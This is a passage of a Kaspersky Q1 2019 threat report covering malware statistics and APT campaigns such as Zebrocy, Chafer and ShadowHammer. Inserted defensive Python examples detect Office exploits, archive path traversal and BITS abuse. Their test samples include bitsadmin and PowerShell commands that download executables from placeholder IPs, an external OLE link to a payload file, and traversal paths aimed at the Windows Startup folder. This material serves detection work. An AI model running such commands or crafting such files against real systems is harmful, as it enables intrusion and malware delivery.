 7  PolyRansom/VirLock   Virus.Win32.PolyRansom            2.82
 8  (generic verdict)    Trojan-Ransom.Win32.Gen           2.02
 9  Crysis/Dharma        Trojan-Ransom.Win32.Crusis        1.51
10  (generic verdict)    Trojan-Ransom.Win32.Cryptor       1.20

* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.
** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors.

Miners

Statistics

Number of new modifications

In Q1 2019, Kaspersky Lab solutions detected 11,971 new modifications of miners.

Number of new miner modifications, Q1 2019

Number of users attacked by miners

In Q1, we detected attacks using miners on the computers of 1,197,066 unique users of Kaspersky Lab products worldwide.

Number of unique users attacked by miners, Q1 2019

Attack geography

Geography of miner attacks, Q1 2019

Top 10 countries by share of users attacked by miners

    Country*      %**
 1  Afghanistan   12.18
 2  Ethiopia      10.02
 3  Uzbekistan     7.97
 4  Kazakhstan     5.84
 5  Tanzania       4.73
 6  Ukraine        4.28
 7  Mozambique     4.17
 8  Belarus        3.84
 9  Bolivia        3.35
10  Pakistan       3.33

* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky Lab products in the country.

Vulnerable applications used by cybercriminals

Statistics for Q1 2019 show that vulnerabilities in Microsoft Office are still being utilized more often than those in other applications, due to their easy exploitability and highly stable operation. The percentage of exploits for Microsoft Office did not change much compared to the previous quarter, amounting to 69%.

Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2019

This quarter’s most popular vulnerabilities in the Microsoft Office suite were CVE-2017-11882 and CVE-2018-0802. Both are stack buffer overflows in the Equation Editor component that lead to remote code execution when a crafted document is opened. Lagging behind the leaders by a factor of almost two is CVE-2017-8570, a logic vulnerability and an analog of the no less popular CVE-2017-0199. Next comes CVE-2017-8759, a code-injection flaw in the .NET Framework's SOAP WSDL parser that lets a malicious document infect the computer. Microsoft Office vulnerabilities are overrepresented in the statistics partly because openly available generators of malicious documents exploiting these vulnerabilities have appeared.
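The Equation Editor and OLE-link documents described above leave recognisable traces in the file itself, which is what a mail gateway or sandbox pre-filter keys on. The following is an added example (not Kaspersky's code and not any product's detection logic): a byte-level triage check that flags the Equation Editor 3.0 object (the CLSID {0002CE02-0000-0000-C000-000000000046}, the "Equation Native" stream name and the "Equation.3" ProgID) and the external OLE relationship used by CVE-2017-0199-style documents. The sample documents are constructed in memory; the indicator strings are the standard Office/OLE identifiers, and the check is a first pass that a proper OLE/OOXML parser such as oletools would refine, not a replacement for one.

```python
import io
import re
import zipfile

# Equation Editor 3.0 CLSID {0002CE02-0000-0000-C000-000000000046} as the
# 16 raw bytes found in OLE object headers (Data1..Data3 little-endian).
EQNEDT_CLSID_LE = bytes.fromhex("02CE020000000000C000000000000046")
EQNEDT_CLSID_HEX = EQNEDT_CLSID_LE.hex().encode()            # RTF hex-encodes embedded objects
EQUATION_NATIVE_U16 = "Equation Native".encode("utf-16-le")  # OLE directory entry name
EQUATION_PROGID = b"Equation.3"                              # CompObj stream, \objclass, OOXML ProgID

# CVE-2017-0199-style documents: an OLE relationship whose target is external.
EXTERNAL_OLE_REL = re.compile(
    rb'<Relationship\b[^>]*Type="[^"]*/oleObject"[^>]*TargetMode="External"[^>]*/?>|'
    rb'<Relationship\b[^>]*TargetMode="External"[^>]*Type="[^"]*/oleObject"[^>]*/?>')


def _scan_blob(name, data, hits):
    if EQNEDT_CLSID_LE in data or EQNEDT_CLSID_HEX in data.lower():
        hits.append((name, "equation-editor-clsid"))
    if EQUATION_NATIVE_U16 in data or EQUATION_PROGID in data:
        hits.append((name, "equation-editor-object"))
    if EXTERNAL_OLE_REL.search(data):
        hits.append((name, "external-ole-link"))


def scan_office_bytes(data):
    """Triage an Office/RTF document given as bytes; returns indicator flags."""
    hits = []
    if data[:2] == b"PK":                     # OOXML: inspect every part of the zip
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                _scan_blob(info.filename, zf.read(info), hits)
    else:                                     # legacy OLE2 (D0 CF 11 E0) or RTF: flat scan
        _scan_blob("<root>", data, hits)
    kinds = {k for _, k in hits}
    return {
        "equation_editor": bool(kinds & {"equation-editor-clsid", "equation-editor-object"}),
        "external_ole_link": "external-ole-link" in kinds,
        "hits": hits,
    }


def _make_docx(parts):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in parts.items():
            zf.writestr(name, body)
    return buf.getvalue()


# Constructed samples (minimal OOXML skeletons, not real malware).
BENIGN_RELS = (b'<Relationships><Relationship Id="rId1" '
               b'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" '
               b'Target="styles.xml"/></Relationships>')
SAMPLE_EQNEDT = _make_docx({
    "word/document.xml": b"<w:document/>",
    "word/_rels/document.xml.rels": BENIGN_RELS,
    # OLE2 magic, padding, then the Equation Editor CLSID and stream name
    "word/embeddings/oleObject1.bin": (b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1" + b"\x00" * 24
                                       + EQNEDT_CLSID_LE + EQUATION_NATIVE_U16),
})
SAMPLE_EXTERNAL = _make_docx({
    "word/document.xml": b"<w:document/>",
    "word/_rels/document.xml.rels": (
        b'<Relationships><Relationship Id="rId5" '
        b'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
        b'Target="http://198.51.100.10/payload.rtf" TargetMode="External"/></Relationships>'),
})
SAMPLE_BENIGN = _make_docx({"word/document.xml": b"<w:document/>",
                            "word/_rels/document.xml.rels": BENIGN_RELS})
SAMPLE_RTF = b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata 0105000002000000}}}"

if __name__ == "__main__":
    for label, blob in [("eqnedt", SAMPLE_EQNEDT), ("external", SAMPLE_EXTERNAL),
                        ("benign", SAMPLE_BENIGN), ("rtf", SAMPLE_RTF)]:
        print(label, scan_office_bytes(blob))
```

Any legitimate document that embeds an equation will also trip the Equation Editor check, so in practice this is a routing decision (send to a sandbox, strip the object) rather than a verdict; the external OLE link, by contrast, has almost no benign use in mail-borne documents and is safe to block outright.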

In Q1, the share of detected exploits for browsers amounted to 14%, almost five times less than for Microsoft Office. Exploiting browser vulnerabilities has become harder: browser developers keep adding mitigations against whole classes of bugs, so a working attack usually needs a chain of several vulnerabilities (for example a renderer bug plus a sandbox escape) to achieve its objective, which significantly raises the cost of such attacks.

That does not mean sophisticated browser exploits do not exist. A prime example is the actively exploited zero-day vulnerability CVE-2019-5786 in Google Chrome (https://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html). To escape the sandbox it was chained with an exploit for a vulnerability in the win32k.sys driver (CVE-2019-0808), and the targets were users of 32-bit versions of Windows 7.

It is fair to say that Q1 2019, like the quarter before it, was marked by a large number of targeted attacks using zero-days. Kaspersky Lab researchers found an actively exploited zero-day vulnerability in the Windows kernel, which was assigned CVE-2019-0797. The exploit abused a race condition caused by missing thread synchronization in undocumented system calls, resulting in a use-after-free. CVE-2019-0797 is the fourth zero-day vulnerability in Windows found by Kaspersky Lab in recent months.

A remarkable event at the beginning of the year was the discovery of CVE-2018-20250, a vulnerability that had existed for 19 years in the module WinRAR uses to unpack ACE archives. The component does not sufficiently validate the file paths stored in the archive, so a specially crafted ACE archive lets an attacker write an executable into the system's autorun (Startup) directory. The vulnerability was put to use immediately to distribute malicious archives.
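The WinRAR bug above, and the JNEC ransomware archive described in the ransomware highlights, both come down to one missing check: an archive entry name that escapes the extraction directory. The following is an added example, not WinRAR's code or Kaspersky's, of the check an extractor (or a gateway that unpacks attachments) should apply to every stored entry name before writing anything. The entry names are constructed; the last two imitate the shape the ACE filenames relied on, a drive prefix followed by traversal that lands the file in the per-user Startup folder. The policy encoded here is an assumption of the example: any drive letter, UNC prefix, leading separator or residual ".." is rejected outright.

```python
import ntpath
import posixpath


def is_safe_member_path(member: str) -> bool:
    """Return True only if an archive entry name can extract strictly below
    the destination directory. It judges the stored name alone, so it can
    run before anything is written to disk."""
    if not member or "\x00" in member:
        return False
    name = member.replace("\\", "/")          # treat both separators alike
    # A drive letter or UNC prefix makes the path absolute on Windows no
    # matter what follows; a leading '/' is absolute everywhere.
    drive, rest = ntpath.splitdrive(name)
    if drive or rest.startswith("/"):
        return False
    # Collapse '.' and duplicate slashes. posixpath.normpath keeps a leading
    # '..', which is exactly what we want to catch.
    norm = posixpath.normpath(rest)
    if norm == "." or ".." in norm.split("/"):
        return False
    return True


def plan_extraction(members):
    """Split entry names into those we would extract and those we refuse."""
    plan = {"allowed": [], "rejected": []}
    for m in members:
        plan["allowed" if is_safe_member_path(m) else "rejected"].append(m)
    return plan


# Constructed entry names (not taken from a real archive).
SAMPLE_ENTRIES = [
    "readme.txt",
    "docs/./guide.pdf",
    "a/../b.txt",
    "../escape.exe",
    "/etc/passwd",
    "\\\\server\\share\\x.exe",
    "C:\\C:\\Users\\Public\\Start Menu\\Programs\\Startup\\x.exe",
    "C:C:../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/x.exe",
]

if __name__ == "__main__":
    for bucket, names in plan_extraction(SAMPLE_ENTRIES).items():
        print(bucket)
        for n in names:
            print("  ", n)
```

Name validation is necessary but not sufficient: an archive can first create a symbolic link inside the destination and then write through it, so an extractor must also refuse to follow links it created itself (or resolve the final path with realpath after each entry and re-check it against the destination). Rejecting rather than "sanitising" the name is deliberate; stripping one drive prefix and continuing is the kind of partial fix that the double-prefix names exploit.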

Although two years have passed since Microsoft patched the SMB vulnerabilities exploited by the leaked FuzzBunch toolkit (EternalBlue, EternalRomance, etc.), these exploits still occupy all the top positions in our statistics. This is driven by the ongoing growth of malware that uses them as a vector to spread inside corporate networks.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries that are sources of web-based attacks:

The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2019, Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources located in 203 countries across the globe. 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.

Distribution of web attack sources by country, Q1 2019

This quarter, Web Anti-Virus was most active on resources located in the US.

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

    Country*      % of attacked users**
 1  Venezuela     29.76
 2  Algeria       25.10
 3  Greece        24.16
 4  Albania       23.57
 5  Estonia       20.27
 6  Moldova       20.09
 7  Ukraine       19.97
 8  Serbia        19.61
 9  Poland        18.89
10  Kyrgyzstan    18.36
11  Azerbaijan    18.28
12  Belarus       18.22
13  Tunisia       18.09
14  Latvia        17.62
15  Hungary       17.61
16  Bangladesh    17.17
17  Lithuania     16.71
18  Djibouti      16.66
19  Reunion       16.65
20  Tajikistan    16.61

* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.

On average, 13.18% of Internet user computers worldwide experienced at least one Malware-class attack.

Geography of malicious web attacks in Q1 2019 (percentage of attacked users)

Local threats

Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer by infecting files or via removable media, or that initially arrived on the computer in obfuscated form (for example, programs inside complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, and external hard drives.

In Q1 2019, our File Anti-Virus detected 247,907,593 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of users of Kaspersky Lab products on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that as of this quarter, the rating includes only Malware-class attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

    Country*        % of attacked users**
 1  Uzbekistan      57.73
 2  Yemen           57.66
 3  Tajikistan      56.35
 4  Afghanistan     56.13
 5  Turkmenistan    55.42
 6  Kyrgyzstan      51.52
 7  Ethiopia        49.21
 8  Syria           47.64
 9  Iraq            46.16
10  Bangladesh      45.86
11  Sudan           45.72
12  Algeria         45.35
13  Laos            44.99
14  Venezuela       44.14
15  Mongolia        43.90
16  Myanmar         43.72
17  Libya           43.30
18  Bolivia         43.17
19  Belarus         43.04
20  Azerbaijan      42.93

* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.

These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, or external hard drives.

On average, 23.62% of user computers globally faced at least one Malware-class local threat in Q1.

IT threat evolution Q1 2019

Kaspersky Securelist - 23 May 2019 - 12:00

Targeted attacks and malware campaigns

Go Zebrocy

Zebrocy was first observed being used as a Sofacy backdoor in 2015. However, the collection of cases where this tool has been used means that we consider it a subset of activity in its own right. On the basis of this threat actor’s past behaviour, we predicted last year that Zebrocy would continue to innovate in its malware development. The group has developed malware in Delphi, AutoIT, .NET, C# and PowerShell. Since May 2018, Zebrocy has added the “Go” language to its arsenal – the first time that we have observed a well-known APT threat actor deploy malware written in this compiled open-source language.

Zebrocy continues to target government-related organizations in Central Asia, both in-country and in remote locations, as well as a new diplomatic target in the Middle East. The group also continued to innovate. Much of the spear-phishing remains thematically the same and continues to be characteristically high volume for a targeted attacker – a trend that is likely to continue. However, the remote locations of the Central Asian targets are becoming more spread out – including South Korea, the Netherlands and others. The focus to date has been on Windows, but we expect the group to continue making further innovations within its malware set – perhaps all their components will soon support every platform used by their victims, including Linux and Mac OS.

GreyEnergy overlap with Zebrocy

GreyEnergy is believed to be a successor to the BlackEnergy group (aka Sandworm), best known for its involvement in attacks on Ukrainian energy facilities in 2015 that led to power outages. Like its predecessor, GreyEnergy has been detected attacking industrial and ICS targets, mainly in Ukraine.

Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and Zebrocy.

No direct evidence exists as to the origins of GreyEnergy, but the links between GreyEnergy and Zebrocy suggest the groups are related. Kaspersky Lab researchers have detailed how both groups shared the same C2 (command-and-control) server infrastructure for a certain period of time and how both targeted the same organization almost simultaneously, which more or less confirms the relationship between the two.

Chafer uses Remexi malware to spy on Iran-based diplomatic agencies

Throughout autumn 2018, we analyzed a long-standing (and still active at that time) cyber-espionage campaign that primarily targeted foreign diplomatic entities in Iran. The attackers used an improved version of the Remexi malware, previously associated with an APT threat actor that Symantec calls Chafer. This group has been observed since at least 2015, but based on things such as compilation time-stamps, and C2 registration, it’s possible that the group has been active for even longer. Traditionally, Chafer has focused on targets inside Iran, although its interests clearly include other countries in the Middle East.

The attackers rely heavily on Microsoft technologies on both client and server sides. The Trojan uses standard Windows utilities such as the Microsoft BITS (Background Intelligent Transfer Service) “bitsadmin.exe” to receive commands and exfiltrate data. This data includes keystrokes, screenshots, and browser-related data such as cookies and history, decrypted where possible. The C2 is based on IIS using .ASP technology to handle the victims’ HTTP requests.
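Because Remexi drives BITS through the stock bitsadmin.exe, the behaviour shows up in process-creation telemetry (Sysmon event 1 or Windows event 4688 with command-line auditing) rather than as a foreign binary. The following is an added example of the detection logic a SOC would run over such events; it is not Kaspersky's code, and the events it processes are constructed in a Sysmon-like shape, not real telemetry and not Remexi's actual command lines. The severity rules (SetNotifyCmdLine or an executable path raises the alert to high; the PowerShell BITS cmdlets are treated as the same technique) are assumptions of the example.

```python
import re

BITSADMIN_RE = re.compile(r"(?:^|\\)bitsadmin\.exe$", re.I)
POWERSHELL_RE = re.compile(r"(?:^|\\)(?:powershell|pwsh)\.exe$", re.I)
# bitsadmin switches that create or feed a job, or hook a command to it.
JOB_SWITCH_RE = re.compile(r"/(?:transfer|create|addfile|resume|upload)\b", re.I)
NOTIFY_RE = re.compile(r"/SetNotifyCmdLine\b", re.I)
PS_BITS_RE = re.compile(r"\b(?:Start|Add|Set)-Bits(?:Transfer|File)\b", re.I)
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
EXEC_EXT_RE = re.compile(r"\.(?:exe|dll|scr|ps1|vbs|js|bat|cmd)\b", re.I)


def classify_event(ev):
    """Return an alert dict for one process-creation event, or None."""
    image, cmd = ev.get("image", ""), ev.get("command_line", "")
    reasons = []
    if BITSADMIN_RE.search(image):
        if NOTIFY_RE.search(cmd):
            reasons.append("SetNotifyCmdLine: a command runs when the job completes")
        if JOB_SWITCH_RE.search(cmd):
            reasons.append("bitsadmin job created or fed")
    elif POWERSHELL_RE.search(image) and PS_BITS_RE.search(cmd):
        reasons.append("BITS cmdlet invoked from PowerShell")
    if not reasons:
        return None                      # e.g. 'bitsadmin /list' is routine admin use
    urls = URL_RE.findall(cmd)
    if urls:
        reasons.append("remote endpoint: " + ", ".join(urls))
    if EXEC_EXT_RE.search(cmd):
        reasons.append("executable/script path on the command line")
    high = NOTIFY_RE.search(cmd) is not None or EXEC_EXT_RE.search(cmd) is not None
    return {
        "host": ev.get("host"), "user": ev.get("user"), "parent": ev.get("parent_image"),
        "severity": "high" if high else "medium",
        "reasons": reasons, "command_line": cmd,
    }


def detect_bits_abuse(events):
    return [a for a in map(classify_event, events) if a]


# Constructed process-creation events (Sysmon-like fields; not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\alice", "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "command_line": "bitsadmin /transfer job1 /download /priority high "
                     "http://203.0.113.7/u/upd.dat C:\\Users\\alice\\AppData\\Roaming\\upd.exe"},
    {"host": "WS01", "user": "CORP\\alice", "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "command_line": "bitsadmin /SetNotifyCmdLine job1 C:\\Users\\alice\\AppData\\Roaming\\upd.exe NULL"},
    {"host": "WS02", "user": "NT AUTHORITY\\SYSTEM", "parent_image": "C:\\Windows\\System32\\svchost.exe",
     "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "command_line": "bitsadmin /list /allusers"},
    {"host": "WS03", "user": "CORP\\bob",
     "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell -NoP -c Start-BitsTransfer -Source http://203.0.113.7/r "
                     "-Destination C:\\Users\\Public\\r.exe"},
    {"host": "WS04", "user": "CORP\\carol", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "command_line": "bitsadmin /create /upload backup-job"},
    {"host": "WS05", "user": "CORP\\dave", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for alert in detect_bits_abuse(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["host"], alert["user"], "|", "; ".join(alert["reasons"]))
```

Two caveats a practitioner would add: BITS jobs created through the API rather than the command line never appear as bitsadmin.exe, so the Microsoft-Windows-Bits-Client/Operational log (job start and stop events) and the parent process of the transfer should be monitored alongside this; and upload jobs deserve as much attention as downloads, since on this campaign BITS carried the stolen data out as well as the commands in.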

New zero-day vulnerability exploited by APT threat actors

In February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows – the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we have discovered recently using our technologies. Further analysis led us to uncover a zero-day vulnerability in “win32k.sys”. We reported this to Microsoft on February 22, who confirmed the vulnerability and assigned it CVE-2019-0797. Microsoft released a patch on March 12, 2019, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin with the discovery. Just as with CVE-2018-8589, we believe that this exploit is being used by several threat actors, including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to have used zero-days before, SandCat is a new APT actor that we discovered only recently.

Lazarus continues to target crypto-currency exchanges

The Lazarus APT group is well-known for targeting financial organizations. In the middle of 2018, we published our report on ‘Operation AppleJeus‘, highlighting the threat actor’s focus on crypto-currency exchanges, using a fake company with a backdoored product aimed at crypto-currency businesses. One of the key findings was the group’s new ability to target Mac OS. Since then, Lazarus has expanded its operations for this platform. Further tracking of the group’s activities enabled us to discover a new operation, active since at least November 2018, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers.

The Lazarus group continues to update its TTPs (Tactics, Techniques and Procedures) to help it fly under the radar. We would urge organizations involved in the booming crypto-currency or technological startup industry to exercise extra caution when dealing with new third parties or installing software. It’s best to check new software with an anti-virus program or at least use popular free virus-scanning services such as VirusTotal. You should never set ‘Enable Content’ (macro scripting) in Microsoft Office documents received from new or untrusted sources. If you need to try out new applications, it’s better to do so offline or on an isolated network virtual machine which you can erase with a few clicks. For more details on this and other research, you can subscribe to our APT intelligence reports.

Under the [Shadow]Hammer

In January, we discovered a sophisticated supply-chain attack involving the ASUS Live Update Utility, used to deliver BIOS, UEFI and software updates to ASUS laptops and desktops. The attackers added a backdoor to the utility and then distributed it to users through official channels. ASUS has a wide install base, making this an attractive target for APT threat actors. The compromised version of the utility was distributed to a large number of people between June and November 2018. Our telemetry shows that 57,000 Kaspersky Lab customers downloaded and installed it, although we believe the real scale of the problem is much bigger, possibly affecting over a million users worldwide.

The goal of the attack was to surgically target an unknown pool of users, identified by their network adapter MAC addresses. The attackers hardcoded a list of MAC addresses in the Trojanized samples, which identifies the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it’s possible that other samples exist which target different MAC addresses. You can check if your MAC address is on the target list here.
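The target check described above can be reproduced offline. Kaspersky's technical write-up of ShadowHammer described the embedded list as MD5 hashes of MAC addresses rather than the addresses themselves (the text above simplifies), which is why a victim has to hash their own address to compare. The following is an added example, not Kaspersky's checker and not the real target list: the hash set is constructed from two made-up MAC addresses, and because this page does not say which textual form of the address was hashed, the example tries the common spellings (bare, colon- and dash-separated, either case) and matches on any of them.

```python
import hashlib
import uuid


def _md5(text):
    return hashlib.md5(text.encode("ascii")).hexdigest()


def mac_variants(mac):
    """All common spellings of one MAC, since the hashed form is unknown."""
    raw = "".join(c for c in mac.lower() if c in "0123456789abcdef")
    if len(raw) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    pairs = [raw[i:i + 2] for i in range(0, 12, 2)]
    forms = {raw, ":".join(pairs), "-".join(pairs)}
    return forms | {f.upper() for f in forms}


# Constructed target list: MD5 digests of two made-up MAC addresses, stored
# in different textual forms. It is NOT the real ShadowHammer list.
CONSTRUCTED_TARGET_HASHES = {
    _md5("00:11:22:33:44:55"),
    _md5("A1-B2-C3-D4-E5-F6"),
}


def is_targeted(mac, hashes=CONSTRUCTED_TARGET_HASHES):
    """True if any spelling of `mac` hashes to an entry in the target list."""
    return any(_md5(form) in hashes for form in mac_variants(mac))


def find_targeted(macs, hashes=CONSTRUCTED_TARGET_HASHES):
    return [m for m in macs if is_targeted(m, hashes)]


def local_mac():
    """One local adapter's MAC via uuid.getnode(). A real check must enumerate
    every adapter (e.g. 'getmac /v' on Windows), because the implant could
    key on any of them."""
    return "{:012x}".format(uuid.getnode())


if __name__ == "__main__":
    print("targeted:", find_targeted(["de:ad:be:ef:00:01", "00-11-22-33-44-55", local_mac()]))
```

Hashing the list is what let the backdoor ship to a million machines without revealing who the 600-odd intended victims were; the same property means a defender cannot recover the targets from the list, only test a known address against it.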

Other malware news

Razy Trojan steals crypto-currency

While many browser extensions make our lives easier, some are altogether more dangerous, bombarding us with advertising or collecting information about our activities. Some are even designed to steal money. We recently reported the Razy Trojan, malware that installs a malicious browser extension on the victim’s computer or infects an already installed extension. To do so, it disables the integrity check for installed extensions and automatic updates for the targeted browser. The Trojan works with Google Chrome, Mozilla Firefox and Yandex browsers, though it has different infection scenarios for each browser type. Razy spreads via advertising blocks on websites and is distributed from free file-hosting services under the guise of legitimate software. Razy serves several purposes, mostly related to the theft of crypto-currency. Its main tool, the script ‘main.js’, is capable of searching for addresses of crypto-currency wallets on websites and replacing them with the attacker’s wallet addresses, spoofing images of QR codes pointing to wallets, modifying the web pages of crypto-currency exchanges and spoofing Google and Yandex search results.

Turning ATMs into slot machines

‘Jackpotting’ refers to the fraudulent methods used by criminals to obtain cash from ATMs. One recent example is the WinPot malware. The malware is notable because the criminals designed the user interface to resemble a slot machine.

However, unlike the machines in a casino, an ATM infected with WinPot always pays out – to the criminals. The malware window displays the denomination of banknotes for each cassette, so that the money mule operating the malware just needs to select the cassette with the most money in it and press ‘Spin’. The ‘Scan’ button can be used to recount the notes. The authors also include an emergency ‘Stop’ button, to allow the mule to cut short the pay out so as not to arouse suspicion.

There are several versions of the malware, and while their core functionality is essentially the same, there are some differences. For example, some versions will only dispense cash for a limited period of time and then they deactivate themselves. As with Cutlet Maker, WinPot is available on the Darknet for between $500 and $1,000, depending on the version.

To block attacks of this kind, we recommend that banks adopt device control and whitelisting. The former will block attempts to implant malware in the ATM using a USB device, while the latter will prevent execution of unauthorized software on the ATM. Kaspersky Embedded Systems Security can be used to secure ATMs.

Pirate Matryoshka

Using torrent trackers to spread malware is a well-known practice: cybercriminals disguise it as popular software, computer games, media files and other sought-after content. Earlier this year we detected one such campaign, when The Pirate Bay (TPB) tracker filled up with harmful files used to distribute malware under the guise of cracked copies of paid programs. The tracker contained malicious torrents created from dozens of different accounts, including some registered on TPB for quite some time. Instead of the expected software, the downloaded file was a Trojan, Pirate Matryoshka, whose basic logic was implemented by SetupFactory installers.

During the initial stage, the installer decrypts another SetupFactory installer to display a phishing web page. This page opens directly in the installation window and requests the user’s TPB account credentials, supposedly to continue the process. The second downloaded component is also a SetupFactory installer, used to decrypt and run four PE files in sequence. The second and fourth of these files are downloaders for the InstallCapital and MegaDowl file partner programs (which Kaspersky Lab classifies as adware). These usually find their way on to people’s computers through file sharing sites. Besides downloading the required content, their goal is to install additional software while carefully hiding the option to cancel.

The other two files are auto-clickers written in Visual Basic that are required to prevent the user from canceling the installation of additional software (in which case the cybercriminals would go away empty-handed). The auto-clickers are run before the installers: when the installer windows are detected, they check the boxes and click the buttons needed to give the user’s consent to install the unnecessary software.

Pirate Matryoshka results in the victim being flooded with unwanted programs. The owners of file partner programs often do not track the programs offered in their downloaders: our research shows that one in five files offered by partner installers is malicious, including pBot, Razy and others.

Mirai now used to target enterprise devices

Researchers from Palo Alto Networks’ Unit 42 recently reported a new variant of Mirai, the infamous IoT botnet. This malware is best known for its use in a massive DDoS attack on the servers of DNS provider Dyn, in 2016. The botnet is now equipped with a much wider range of exploits, which makes it even more dangerous and allows it to spread faster.

More troubling is the fact that the new strain is targeting not only its usual victims – routers, IP cameras, and other ‘smart’ things – but also enterprise IoT devices. This is no surprise since the Mirai source code was leaked some time ago, allowing any attacker with sufficient programming skills to use it. This explains why this botnet features highly in our report, ‘DDoS attacks in Q4 2018‘; and the fact that, in our report, ‘New trends in the world of IoT threats‘, Mirai is responsible for 21% of all IoT infections.

It is possible that future waves of Mirai infections might even include industrial IoT devices.

To reduce the risk of Mirai infection, we recommend that you install patches and firmware updates as soon as they become available, monitor traffic from each device for anomalies, change default passwords and enforce an effective password policy for staff, and reboot any device that is behaving strangely (this removes the malware, which does not persist across reboots, but will not, on its own, prevent re-infection). To help companies protect themselves against the latest IoT-related threats we have released a new intelligence data feed for IoT-related threats.

‘Collection #1’ and other data leaks

On January 17, security researcher Troy Hunt reported a leak of more than 773 million email addresses and 21 million unique passwords. The data, dubbed ‘Collection #1’, was originally shared on the popular cloud service MEGA. Collection #1 is just a small part of a bigger leak of about 1TB of data, split into seven parts and distributed through a data-trading forum. The full package is a collection of credentials leaked from different sources during the past few years, the most recent being from 2017, so we were unable to identify any more recent data in this ‘new’ leak. The new data dump, dubbed ‘Collection #2-5’, was discovered by researchers at the Hasso Plattner Institute in Potsdam.

In February, further data dumps occurred. Details of 617 million accounts, stolen from 16 hacked companies, were put up for sale on Dream Market, accessible via the Tor network. The hacked companies include Dubsmash, MyFitnessPal, Armor Games and CoffeeMeetsBagel. Subsequently, data from a further eight hacked companies was posted to the same market place. Then in March, the hacker behind the earlier data dumps posted stolen data from a further six companies.

One of the particularly worrying aspects of these leaks is the fact that not all of the companies affected had previously reported the data breaches.

The impact on a company affected by a data breach goes beyond the loss of data. It includes the costs of investigating the breach, closing any security loopholes and maintaining business continuity. On top of that, a company’s reputation can be affected, especially if it becomes clear that the company failed to take adequate steps to secure the personal data of its customers.

The impact on customers can also be dramatic, especially if they use the same login credentials to access other online services. You can find our advice on how to mitigate the impact of a data breach here.
